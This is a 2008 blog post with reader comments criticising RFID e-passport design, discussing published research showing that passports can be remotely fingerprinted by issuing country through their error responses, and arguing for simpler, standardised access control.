Passports were always meant to help track citizens. According to lore, they were invented in the 19th century to stop Frenchmen evading the draft (conscription), which is still an issue in some countries. BigMac points to a Dutch working paper "Fingerprinting Passports," that indicates that passports can now be used to discriminate against the bearer's country of issue, to a distance of maybe 25cm. Future Napoleons will be happy.
Because terrorising the reader over breakfast is currently good writing style by governments and media alike, let's highlight the dangers first. The paper speculates:
Given that we can remotely detect the presence of a passport of a particular country, how could this functionality be abused? One abuse case that has been suggested is a passport bomb, designed to go off if someone with a passport of a certain nationality comes close. One could even send such a bomb by post, say to an embassy. A less spectacular, but possibly more realistic, use of this functionality would by passport thieves, who can remotely check if someone is carrying passport and if it is of a ‘suitable’ nationality, before they decide to rob them.
From the general fear department, we can also add that overseas travellers sometimes have a fear of being mugged, kidnapped, hijacked or simply shot because of their mere membership of a favourable or unfavourable country.
Now that we have the FUD off our chest, let's talk details. The trick involves sending a series of commands (up to 4) to the RFID in the passport, each of which are presumably rejected by the passport. The manner of rejection differs from country to country, so a precise fingerprint-of-country can be formed simply by examining each rejection, and then choosing a different command to further narrow the choices.
How did this happen? I would speculate that the root failure is derived from bureaucrats' never-ending appetite for complex technological solutions to simple problems. In this case, the first root cause is the use of the RFID, being by intention and design something that can be read from up to 10 cm.
It is inherently attackable, and therefore by definition a very odd choice for security. The second complexity, then, involved implementing something to stop the attackers reading off the RFIDs without permission. The solution to an active read-off attack is encryption, of course! Which leads to our third complexity, a secret key, which is written inside the passport, of course! Which immediately raises issues of brute-forcing (of course!) and, as the paper references, it turns out, brute forcing attacks work on some countries' passports because the secret key is .. poorly chosen.
All of this complexity, er, solution, means something called Basic Access Control is added to the RFID in order to ensure the use of the secret key. Which means a series of commands meant to defend the RFID. If we factor in the tendency for each country to implement passports entirely alone (because they are more scared of each other than they are of their citizens), we can see that each solution is proprietary and home-grown. To cope with this, the standard was written to be very flexible (of course!). Hence, it permits wide diversity in response to errors.
Whoops! Security error. In the world of security, we say that one should be precise in what we send, and precise in what we return.
From that point of view, this is poor security work by the governments of the world, but that's to be expected. The US State Department can now derive some satisfaction from earlier blunders; because of their failure to implement any form of encryption or access control, American passports can be read by all (terrorists and borderists alike), which apparently forced them to add aluminium foil into the passport cover to act as a Faraday cage. Likely, the other countries will now have to follow suit, and the smugness of being sophisticated and advanced in security terms ("we've got BAC!") will be replaced by a dawning realisation that they should have adopted the simpler solutions in the first place.
Posted by iang at April 9, 2008 03:33 AM | TrackBackThis vulnerability in itself can be fatal, which is my opinion constitutes a complete and catastrophic failure.
http://www.cato-at-liberty.org/2006/07/11/fake-ids-save-lives-in-iraq/
Posted by: Sam (Cato on fake Id's saving lives) at April 11, 2008 08:02 AMSSL (and TLS) generally sends client certificates in plaintext, to ensure that every man-in-the-middle knows your identity when you login somewhere, even if he can't decrypt your traffic.
Posted by: Philipp at April 11, 2008 11:23 AMI am amazed that this massive scale critical infrastructure project driven by the US was so hastily executed, especially given the relatively long lifetime of these documents (10 years which is an eternity in technology security).
In any case we can already fit multiple kilobytes of data onto paper using standard printing processes (http://en.wikipedia.org/wiki/QR_Code) and almost certainly a lot more using passport printing/engraving technology. That being the case, why go for dangerous RF technology at all, and if you must, why not use a high density barcode to print a secure key?
Also, given the danger I highlighted above (death), how is it possible that the 'front door' is not standardised? Ideally these things would say nothing until authenticated to using (some derivative of) the printed key.
Finally, given the risk of eavesdropping at border control, one would hope that the conversation between the reader and the passport was well secured (for example by leveraging the shared key to set up a session key, or better yet, simply verifying the integrity of the machine readable content and not transmitting secret data unless absolutely necessary and even then only ever within the confines of the reader which one would hope was protected by a faraday cage or similar.